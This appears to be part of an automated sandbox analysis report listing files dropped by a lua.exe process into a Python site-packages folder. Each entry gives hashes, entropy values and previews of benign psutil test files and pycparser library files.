Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""macOS specific tests."""..import re.import time..import psutil.from psutil import MACOS.from psutil.tests import HAS_BATTERY.from psutil.tests import PsutilTestCase.from psutil.tests import retry_on_failure.from psutil.tests import sh.from psutil.tests import spawn_testproc.from psutil.tests import terminate.from psutil.tests import TOLERANCE_DISK_USAGE.from psutil.tests import TOLERANCE_SYS_MEM.from psutil.tests import unittest...def sysctl(cmdline):. """Expects a sysctl command with an argument and parse the result. returning only the value of interest.. """. out = sh(cmdline). result = out.split()[1]. try:. return int(result). except ValueError:. return result...def vm_stat(field):. """Wrapper around 'vm_stat' cmdline utility.""". from psutil._psutil_pos

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_posix.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15143
Entropy (8bit):	4.568206158700274
Encrypted:	false
SSDEEP:	192:/TTvDqTVTMg+s5EQg5PwnicWliTC+eo8U9g628S8628sgcq81Yf0GwJUCCxPdtRH:/nvOTVTB15EQumDTCW180UCWPdtRnd1
MD5:	116F03677F36741318E0E8B2502ED7E0
SHA1:	0559AC3EF9E434E9DFE41B3B068CD45ABE6F951C
SHA-256:	A8DD16DEBEFAD05E5CE9D1854D8295B323631B5EB05FF7E956CDA4D4AF02A921
SHA-512:	D5079A209A624FD1E780A05597BADF411B9B610E4FABA231BFC04D9DACE90FDD95EBBCC7E56C1564C80FB3972F40A1B22E95FF61E2143A78122B963B9B3524AE
Malicious:	false
Preview:	#!/usr/bin/env python3.# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""POSIX specific tests."""..import datetime.import errno.import os.import re.import subprocess.import time..import psutil.from psutil import AIX.from psutil import BSD.from psutil import LINUX.from psutil import MACOS.from psutil import OPENBSD.from psutil import POSIX.from psutil import SUNOS.from psutil.tests import CI_TESTING.from psutil.tests import spawn_testproc.from psutil.tests import HAS_NET_IO_COUNTERS.from psutil.tests import mock.from psutil.tests import PsutilTestCase.from psutil.tests import PYTHON_EXE.from psutil.tests import retry_on_failure.from psutil.tests import sh.from psutil.tests import skip_on_access_denied.from psutil.tests import terminate.from psutil.tests import unittest.from psutil.tests import which..if POSIX:. import mmap. import resource.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_process.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	59703
Entropy (8bit):	4.5319973752071965
Encrypted:	false
SSDEEP:	768:XhUJJrmFWl2I5IVB4TLcVjO8VORMvulohZJsx80/+EkmJrd1:Xm/kP4XcwuvpZJsxjCml
MD5:	E4A3C052D22BAC10ECDADFBA7A02855C
SHA1:	283499A8CAC872435EE045351316FFEA4AF350B7
SHA-256:	6C2702A9F736271288F4FBEE5BB9A9158E7DF6BC683192B39310D14FE3A6B349
SHA-512:	B5C531A60B90EB95CE0164AF2D81959DB3D9F7B1849DA457FB88BCA9DCC1CCB3216C2C88D795A398275723063F8EEA0F4C604C4C63EE53A569D83A16F5C0873E
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Tests for psutil.Process class."""..import collections.import errno.import getpass.import itertools.import os.import signal.import socket.import stat.import subprocess.import sys.import textwrap.import time.import types..import psutil..from psutil import AIX.from psutil import BSD.from psutil import LINUX.from psutil import MACOS.from psutil import NETBSD.from psutil import OPENBSD.from psutil import OSX.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._common import open_text.from psutil._compat import FileNotFoundError.from psutil._compat import long.from psutil._compat import PY3.from psutil._compat import super.from psutil.tests import APPVEYOR.from psutil.tests import call_until.from psutil.tests import CI_TESTING.from psutil.tests import copyload_share

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_sunos.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1351
Entropy (8bit):	4.740789355026281
Encrypted:	false
SSDEEP:	24:qaWpPMxSbJDBb1r1V1GMcaptTQYDOxKASPShoE5pL8JFCFR5s5rHah3t1:10P5Rx3TAPuSvpfF4ah3t1
MD5:	56F33F80C7A666C75DE2CAD49EB4733C
SHA1:	A9AB682C8B416E9C9EE343D1F5A5347BCC0252D3
SHA-256:	B68B01EBEE1BA0CE9994855A789661E986C163C8151919B46085E06FF67AF465
SHA-512:	ED19808447105464B33A639294E623495C11AE465123932C0BB200DDB2AF20782FA1C424758854A0876E4E3E833306DA062A34D3F27142EDD7BB69DF7679D13A
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Sun OS specific tests."""..import os..import psutil.from psutil import SUNOS.from psutil.tests import PsutilTestCase.from psutil.tests import sh.from psutil.tests import unittest...@unittest.skipIf(not SUNOS, "SUNOS only").class SunOSSpecificTestCase(PsutilTestCase):.. def test_swap_memory(self):. out = sh('env PATH=/usr/sbin:/sbin:%s swap -l' % os.environ['PATH']). lines = out.strip().split('\n')[1:]. if not lines:. raise ValueError('no swap device(s) configured'). total = free = 0. for line in lines:. line = line.split(). t, f = line[-2:]. total += int(int(t) * 512). free += int(int(f) * 512). used = total - free.. psutil_swap = psutil.swap_memory(). self.assertEqual(psutil_swap.tota

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_system.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	35596
Entropy (8bit):	4.463089821942629
Encrypted:	false
SSDEEP:	384:22rbkJHLrKkkw+bPjvZVV3ro5Er/QPJae2qdsd1:JMJvkwijZVV85EDAJZRWd1
MD5:	EA99DBB2C7D50E3EED1CAA924B183DBB
SHA1:	89F1B0EF3AA0DFA1C3F25FF39B3F7CE97AB35676
SHA-256:	753D2FDD7E19665D513B4011614FC092F340CEC1ADDB5088210F7EFD5BDB41AE
SHA-512:	2B148EAAFA16AC2D4883A9C33513D538ACC2DA33A9594A7C3C415DAF26B05BE0F7FFE996FB8A59F9C465366D3B9A70DF3AC22F691DF688076ECC5C12EB90749D
Malicious:	false
Preview:	#!/usr/bin/env python3..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Tests for system APIS."""..import contextlib.import datetime.import errno.import os.import pprint.import shutil.import signal.import socket.import sys.import time..import psutil.from psutil import AIX.from psutil import BSD.from psutil import FREEBSD.from psutil import LINUX.from psutil import MACOS.from psutil import NETBSD.from psutil import OPENBSD.from psutil import POSIX.from psutil import SUNOS.from psutil import WINDOWS.from psutil._compat import FileNotFoundError.from psutil._compat import long.from psutil.tests import ASCII_FS.from psutil.tests import check_net_address.from psutil.tests import CI_TESTING.from psutil.tests import DEVNULL.from psutil.tests import enum.from psutil.tests import GLOBAL_TIMEOUT.from psutil.tests import HAS_BATTERY.from psutil.tests import HAS_CPU_FREQ.from psut

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_testutils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14420
Entropy (8bit):	4.602195014102643
Encrypted:	false
SSDEEP:	192:/OT60hRfBE6u+aa1U1pRV6WQ4JJ3y+xoNWYwvDpDDDnylsd1:/260hRO1puHHLSd1
MD5:	0C6704616E4AA0EC2CE1EB664F119DDA
SHA1:	474FCEAAEBC2062C459DE72EB1D69FD450FDA046
SHA-256:	03D9E77A1DBD67DACDEF03387A4060E107572F97620F8982508D54C3A0798DE7
SHA-512:	0605A3BEDA8D2BDD4658E2F4E0F94A632C478633FF05EA766DC82A9EC801C43B48717C4B4D3205AB19A05DBA91CC8EBBFD8FB0C3C49EB354D105A69D9AB9B767
Malicious:	false
Preview:	#!/usr/bin/env python3.# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Tests for testing utils (psutil.tests namespace).."""..import collections.import contextlib.import errno.import os.import socket.import stat.import subprocess..from psutil import FREEBSD.from psutil import NETBSD.from psutil import POSIX.from psutil._common import open_binary.from psutil._common import open_text.from psutil._common import supports_ipv6.from psutil.tests import bind_socket.from psutil.tests import bind_unix_socket.from psutil.tests import call_until.from psutil.tests import chdir.from psutil.tests import CI_TESTING.from psutil.tests import create_sockets.from psutil.tests import get_free_port.from psutil.tests import HAS_CONNECTIONS_UNIX.from psutil.tests import is_namedtuple.from psutil.tests import mock.from psutil.tests import process_namespace.from psut

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_unicode.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12459
Entropy (8bit):	4.776242556435487
Encrypted:	false
SSDEEP:	192:/RXsup2A/4+bKAubOBKhXsO7URBaowNDAMvw1WSwU+xGjszhJsd1:/R8up2H+bKAuiBUXsO7iBJRd1
MD5:	F4CC813B50230E7FB8C90BE0FEA35C7C
SHA1:	864E56B1EBFEC9CE9B09DE8FB464F2F65D819D85
SHA-256:	70FC32D98516F1757453DA08B0C0811614B648CBB986D7450F70D38A6991B627
SHA-512:	3DD422241ACC519B2CF853DA07D8A07D941EA0C0A417401FDE3C0CA7516D659EB57A33ECC5B6A0DE0BB195875A67E7E9B2E08A24A1CA191F7994D654067DE25D
Malicious:	false
Preview:	#!/usr/bin/env python3.# -- coding: utf-8 --..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".Notes about unicode handling in psutil.======================================..Starting from version 5.3.0 psutil adds unicode support, see:.https://github.com/giampaolo/psutil/issues/1040.The notes below apply to any API returning a string such as.process exe(), cwd() or username():..* all strings are encoded by using the OS filesystem encoding. (sys.getfilesystemencoding()) which varies depending on the platform. (e.g. "UTF-8" on macOS, "mbcs" on Win).* no API call is supposed to crash with UnicodeDecodeError.* instead, in case of badly encoded data returned by the OS, the. following error handlers are used to replace the corrupted characters in. the string:. * Python 3: sys.getfilesystemencodeerrors() (PY 3.6+) or. "surrogatescape" on POSIX and "replace" o

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\tests\test_windows.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32589
Entropy (8bit):	4.706977660617319
Encrypted:	false
SSDEEP:	768:Xxy/QUF6eWymjgZUqv34S5KFGWrhwFpDchqZEd1:XQoZeWfkZUC4yKFGWFwFpDchq4
MD5:	16251C833AD81F8BCA1A1B11814197FD
SHA1:	0EC1B182F07726230DF536A1AE2351FDC1694A05
SHA-256:	7641246C5114688D8BE6CC85B5EF6FA24E369FFAFF0EC4E36C5BBA219E92CEF4
SHA-512:	F2C643E7ADC6298F8D9245C17DAF4E5125298E70814E896A926F0F1FDB382B9BB03E031CF5BB3221763AE26296088CDB9FE21B3D25C8D322D4D7972FE2E7D677
Malicious:	false
Preview:	#!/usr/bin/env python3.# -- coding: UTF-8 -..# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Windows specific tests."""..import datetime.import errno.import glob.import os.import platform.import re.import signal.import subprocess.import sys.import time.import warnings..import psutil.from psutil import WINDOWS.from psutil._compat import FileNotFoundError.from psutil._compat import super.from psutil.tests import APPVEYOR.from psutil.tests import GITHUB_ACTIONS.from psutil.tests import HAS_BATTERY.from psutil.tests import IS_64BIT.from psutil.tests import mock.from psutil.tests import PsutilTestCase.from psutil.tests import PY3.from psutil.tests import PYPY.from psutil.tests import retry_on_failure.from psutil.tests import sh.from psutil.tests import spawn_testproc.from psutil.tests import terminate.from psutil.tests import TOLERANCE_DISK_USAGE.from psutil.tests import

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	5.123825274809352
Encrypted:	false
SSDEEP:	24:bkOCUneZXof9+bOOrgFTY+JY4vFTzDssd2lBTPj96432sgEOkes8GROKE32s3yJX:be3OOrgJ04vJzIJvP56432s3432s3Ott
MD5:	86F1CEDB4E6410A88CE8E30B91079169
SHA1:	3A3D1C2CF8D81B9A4A823D5F3A865480F9B64977
SHA-256:	3C76629880AEC2F8578ED914701A4FF9E5DA8B60ACB8B7EC675ABF83C90C5168
SHA-512:	61010108E9793976659F4F78328D459BF423E454016CA68AB145D2AC04BAF1C720314943853F9E1938FCAC6B5E396467C505C856658429181F26B8E4715FF877
Malicious:	false
Preview:	pycparser -- A C parser in Python..Copyright (c) 2008-2017, Eli Bendersky.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this . list of conditions and the following disclaimer..* Redistributions in binary form must reproduce the above copyright notice, . this list of conditions and the following disclaimer in the documentation . and/or other materials provided with the distribution..* Neither the name of Eli Bendersky nor the names of its contributors may . be used to endorse or promote products derived from this software without . specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND .ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED .WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE AR

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.9077987685351285
Encrypted:	false
SSDEEP:	24:DkB9CU2BeIZftDZftWZft2ZftYZftRTZft9awqJOLyDe:DkB92VjaaYxrGx6
MD5:	2DF456D8243048EEA1F6F3C4966AF413
SHA1:	38D5CF2634895615836FC0EDA57132F1FE565BAE
SHA-256:	E7F4432D311F9A0F1D876F68734E778D3369FCE2FCD8F965B208241904D4FC3B
SHA-512:	DF7D8CC9AF8D20E4E152D4CD24ED2FF6431B37BF9B51F949CF18BD2DD1BAFDA2552B1518F1445692D2F895138E11A4F203EC6815572D363F9BA5FB7DC99CFA40
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: pycparser.Version: 2.20.Summary: C parser in Python.Home-page: https://github.com/eliben/pycparser.Author: Eli Bendersky.Author-email: eliben@gmail.com.Maintainer: Eli Bendersky.License: BSD.Platform: Cross Platform.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Requires-Python: >=2.7, !=3.0., !=3.1., !=3.2., !=3.3....pycparser is a complete parser of the C language, written in.pure Python using the PLY parsing library..It parses C code into an AST and can serve as a front-end for.C compilers or analysis tools....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2775
Entropy (8bit):	5.6181210478014885
Encrypted:	false
SSDEEP:	48:pnuXuZE7IpDyl9dvSCGoYrPaLooYMnfYEUvY/PoHWrGo7Uch48/Y:sXiKEIdaCGoYrWooYafYEUviSWCo7UcU
MD5:	631657648AAE9A924D352617ADCF96C9
SHA1:	D899B29E0718D9090B2991F0B0E72EA322356E18
SHA-256:	F642EEE03C5A29E9EB1D6AC37F2A21EA32E3D11F1B440FF8605CA218EA3A132B
SHA-512:	C19F077E24B8F53DDF04F89ABABDB3BC71C920BB96293AAC100ECD817ED0DDE5D841639A9806F5F039AA365EE71BBDD46B75627083DD00A59153E118F4D69DAB
Malicious:	false
Preview:	pycparser-2.20.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..pycparser-2.20.dist-info/LICENSE,sha256=PHZimICuwvhXjtkUcBpP-eXai2CsuLfsZ1q_g8kMUWg,1536..pycparser-2.20.dist-info/METADATA,sha256=5_RDLTEfmg8dh29oc053jTNp_OL82PllsggkGQTU_Ds,907..pycparser-2.20.dist-info/RECORD,,..pycparser-2.20.dist-info/WHEEL,sha256=kGT74LWyRUZrL4VgLh6_g12IeVl_9u9ZVhadrgXZUEY,110..pycparser-2.20.dist-info/top_level.txt,sha256=c-lPcS74L_8KoH7IE6PQF5ofyirRQNV4VhkbSFIPeWM,10..pycparser/__init__.py,sha256=O2ajDXgU2_NI52hUFV8WeAjCR5L-sclmaXerpcxqgPo,2815..pycparser/__pycache__/__init__.cpython-37.pyc,,..pycparser/__pycache__/_ast_gen.cpython-37.pyc,,..pycparser/__pycache__/_build_tables.cpython-37.pyc,,..pycparser/__pycache__/ast_transforms.cpython-37.pyc,,..pycparser/__pycache__/c_ast.cpython-37.pyc,,..pycparser/__pycache__/c_generator.cpython-37.pyc,,..pycparser/__pycache__/c_lexer.cpython-37.pyc,,..pycparser/__pycache__/c_parser.cpython-37.pyc,,..pycparser/__pycache__/lextab.cpyth

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVitcv6KjP+tPCCf7irO5S:RtBMwlViWZWBBwt
MD5:	D2A91F104288B412DBC67B54DE94E3AC
SHA1:	5132CB7D835D40A81D25A4A1D85667EB13E1A4D3
SHA-256:	9064FBE0B5B245466B2F85602E1EBF835D8879597FF6EF5956169DAE05D95046
SHA-512:	FACDEE18E59E77AEF972A5ACCB343A2EA9DB03F79D226C5827DC4BCDB47D3937FE347CB1F0A2FC48F035643F58737C875FDF1BD935586A98C6966BFA88C7484A
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.34.2).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser-2.20.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.9219280948873623
Encrypted:	false
SSDEEP:	3:YXH/:W
MD5:	0DE5B0E5C6DF03DA418EADB1A2731207
SHA1:	6B07E5DF84D3F430B78CF44F43410E4B6BE11894
SHA-256:	73E94F712EF82FFF0AA07EC813A3D0179A1FCA2AD140D57856191B48520F7963
SHA-512:	EBC387A148D34161D542FFCA9C1F37F1C0DC99BE3F51567BDF6C408ABEC2FBD7582A89B991F01D7BF808B714E912D31B73D17E8A0444E26DD7D8C80EAD1B1D59
Malicious:	false
Preview:	pycparser.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2815
Entropy (8bit):	4.417498313109139
Encrypted:	false
SSDEEP:	48:BGCRWkZKKUFFog7CKOXUW3+jUSV0/lzJbpfybFFILP:BGCRWy9UFzqUWOjbOldbpKbFCLP
MD5:	8C3BD00E751E8645D416EB0D8E8DA76B
SHA1:	E1588C18DC27101635B03F007065F90FD3E2B2C7
SHA-256:	3B66A30D7814DBF348E76854155F167808C24792FEB1C9666977ABA5CC6A80FA
SHA-512:	38E9659BF2AD4E2C7E2B42F55B4F4D58D88A2DC3A2777EF5F381B670C3417860FC812324C1E371DCCDE7D4C9A2DD104E45CAD1397FADE2E3E2B866491A667605
Malicious:	false
Preview:	#-----------------------------------------------------------------.# pycparser: __init__.py.#.# This package file exports some convenience functions for.# interacting with pycparser.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------.__all__ = ['c_lexer', 'c_parser', 'c_ast'].__version__ = '2.20'..import io.from subprocess import check_output.from .c_parser import CParser...def preprocess_file(filename, cpp_path='cpp', cpp_args=''):. """ Preprocess a file using cpp... filename:. Name of the file you want to preprocess... cpp_path:. cpp_args:. Refer to the documentation of parse_file for the meaning of these. arguments... When successful, returns the preprocessed file's contents.. Errors from cpp will be printed out.. """. path_list = [cpp_path]. if isinstance(cpp_args, list):. path_list += cpp_args. elif cpp_args != '

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\_ast_gen.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10607
Entropy (8bit):	4.281319160583966
Encrypted:	false
SSDEEP:	192:+jidEjcTYTfXnw6ypQtyDJw2JZFdSORLQQt2Jg:+jiuAGO3wGXdSqVt2Jg
MD5:	F7AB024743499111AC984E6902FA1D52
SHA1:	CB388BC02A0164619CCB7E902DD6F0566B50E5F7
SHA-256:	FCB6D1AFF90A6B610779BEF2D20579DB9255DBD9F30946D31F8A19FBD238A88B
SHA-512:	5300A45317774C1A12AB7E0B6ACC4D86136983AB3629C7DAA79BC5C8FFC8FFF5A3731B4929C2B8EA5D23277254ADAD0FE19CD4C457B7A97472FEF75B5C06FACF
Malicious:	false
Preview:	#-----------------------------------------------------------------.# _ast_gen.py.#.# Generates the AST Node classes from a specification given in.# a configuration file.#.# The design of this module was inspired by astgen.py from the.# Python 2.5 code-base..#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------.import pprint.from string import Template...class ASTCodeGenerator(object):. def __init__(self, cfg_filename='_c_ast.cfg'):. """ Initialize the code generator from a configuration. file.. """. self.cfg_filename = cfg_filename. self.node_cfg = [NodeCfg(name, contents). for (name, contents) in self.parse_cfgfile(cfg_filename)].. def generate(self, file=None):. """ Generates the code into file, an open file buffer.. """. src = Template(_PROLOGUE_COMMENT).substitute(. cfg_filename=self.cfg_filename).. src += _PRO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\_build_tables.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	4.73373911997263
Encrypted:	false
SSDEEP:	24:yyfjhZuU0ILaO1NW2ZG34JlCD1JUOU5WV:B7uUdzWzmCv7LV
MD5:	126C4F0817A6409AD4EF95A1CBCD7A0A
SHA1:	DD6D0DE88863CC76D66159F5CAE4D7E46E1371F5
SHA-256:	A1909DDCF961ABEBE457E42E12C69A85C7FE8D423AF8780AB2B00BF60BC5CEE5
SHA-512:	EEB2E3102B72E1BEC05D19E1A40570B1DE578424FD9DB92448A3CF3224F05A06AFDCA53DA72681534F56785C1A81BFA553BBC08D5C0DB61BCAA39C76DCBD220A
Malicious:	false
Preview:	#-----------------------------------------------------------------.# pycparser: _build_tables.py.#.# A dummy for generating the lexing/parsing tables and and.# compiling them into .pyc for faster execution in optimized mode..# Also generates AST code from the configuration file..# Should be called from the pycparser directory..#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------..# Insert '.' and '..' as first entries to the search path for modules..# Restricted environments like embeddable python do not include the.# current working directory on startup..import sys.sys.path[0:0] = ['.', '..']..# Generate c_ast.py.from _ast_gen import ASTCodeGenerator.ast_gen = ASTCodeGenerator('_c_ast.cfg').ast_gen.generate(open('c_ast.py', 'w'))..from pycparser import c_parser..# Generates the tables.#.c_parser.CParser(. lex_optimize=True,. yacc_debug=False,. yacc_optimize=True)..# Load to compile into .pyc.#.imp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\_c_ast.cfg Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4206
Entropy (8bit):	4.885020494046249
Encrypted:	false
SSDEEP:	96:B2l8Wb/X+zPH4Ixo53teTpxvaIBw7I6YvoQ6i:BhWb2QxCvaILmi
MD5:	8BDC63CA901E473F8F8311DA6A4EF833
SHA1:	3D36ABEF17CFD669951BBFDA095580D0E206D83A
SHA-256:	D56F3E0C76B946A66FCA185AFF46F856F28BD02118BFD5B4C45B3F6308B21076
SHA-512:	FD080F436B246C70B8980CC29129A19347BDAFDDF99C0E822564D7A96464D4108381663B8F5C83C87717EB0C878075D6670E138D2095A51A5E98F9EE046DBA9B
Malicious:	false
Preview:	#-----------------------------------------------------------------.# pycparser: _c_ast.cfg.#.# Defines the AST Node classes used in pycparser..#.# Each entry is a Node sub-class name, listing the attributes.# and child nodes of the class:.# <name>* - a child node.# <name>** - a sequence of child nodes.# <name> - an attribute.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------..# ArrayDecl is a nested declaration of an array with the given type..# dim: the dimension (for example, constant 42).# dim_quals: list of dimension qualifiers, to support C99's allowing 'const'.# and 'static' within the array dimension in function declarations..ArrayDecl: [type, dim, dim_quals]..ArrayRef: [name, subscript]..# op: =, +=, /= etc..#.Assignment: [op, lvalue, rvalue]..BinaryOp: [op, left, right]..Break: []..Case: [expr, stmts]..Cast: [to_type, expr*]..# Compound statement in C99 is

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ast_transforms.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3648
Entropy (8bit):	4.120473461364951
Encrypted:	false
SSDEEP:	96:W/ctyV1CuXk/xEo/XLbOb41vltVGqIWg4vmkNyJ/ELk:W//ozbO8bGqFgOmhh
MD5:	8622A181768B2B91E3583BADADF4181E
SHA1:	39024CD084E264D7D7B2C50F87B14AF73B99957A
SHA-256:	F7710D28435396E83315E867AD0D1F769AE28D574DB7F00208FCA03311F8BFB4
SHA-512:	6CF28689B42D605AA7C268C062A64C997141DC3264250DC8E47CA05F8122F157B854C1C45DF57E2713D12D3BCA712DA8411C902EB7B40ED60E226CC5063C85EC
Malicious:	false
Preview:	#------------------------------------------------------------------------------.# pycparser: ast_transforms.py.#.# Some utilities used by the parser to create a friendlier AST..#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#------------------------------------------------------------------------------..from . import c_ast...def fix_switch_cases(switch_node):. """ The 'case' statements in a 'switch' come out of parsing with one. child node, so subsequent statements are just tucked to the parent. Compound. Additionally, consecutive (fall-through) case statements. come out messy. This is a peculiarity of the C grammar. The following:.. switch (myvar) {. case 10:. k = 10;. p = k + 1;. return 10;. case 20:. case 30:. return 20;. default:. break;. }.. Creates this tre

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\c_ast.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	30233
Entropy (8bit):	4.3269725098451
Encrypted:	false
SSDEEP:	192:JH2JZFdSORLQQt2JoeNPtUuDpQvGvmwX8/Tn0jNgUbfZ78KxL3:JHGXdSqVt2JRNDvmw+Tn0jGEZZ3
MD5:	61389CC9AC09DB84E39AF82C9B3A7925
SHA1:	30135054F55294D772D898AAFF4FA38EA136ED87
SHA-256:	25D0F20B74146417D7F7056ED8434EAD040F6DCEF7EC999FF15B68CE1BA46B2A
SHA-512:	FC04C64D77D73A33AA3C34D9B1FCF45CF83C79F4A007D8735FE504555A93AD39927C3851F063357CC27FAB19D0DCFE2056ACDB77D3EC447B5D6BF703D03FFB1B
Malicious:	false
Preview:	#-----------------------------------------------------------------.# ATTENTION .# This code was automatically generated from the file:.# _c_ast.cfg.#.# Do not modify it directly. Modify the configuration file and.# run the generator again..# * **.#.# pycparser: c_ast.py.#.# AST Node classes..#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------...import sys..def _repr(obj):. """. Get the representation of an object, with dedicated pprint-like format for lists.. """. if isinstance(obj, list):. return '[' + (',\n '.join((_repr(e).replace('\n', '\n ') for e in obj))) + '\n]'. else:. return repr(obj) ..class Node(object):. __slots__ = (). """ Abstract base class for AST nodes.. """. def __repr__(self):. """ Generates a python representation of the current node. """. result = self.__class__.__name__ + '('. . indent = ''.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\c_generator.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15365
Entropy (8bit):	4.2741688546426655
Encrypted:	false
SSDEEP:	192:WhNv9rwOpOlq1thSU24Id6mqEJIWsrVjx57pfljsi3emUJDYLovGJxXtG39GyuqW:WhNv91w14vLljTYgjatugjkHF
MD5:	AD44179597E39EF522C2B74954149E00
SHA1:	B82F7C3AB33EDF63024A93DCFC30AE9C3CC2D7D2
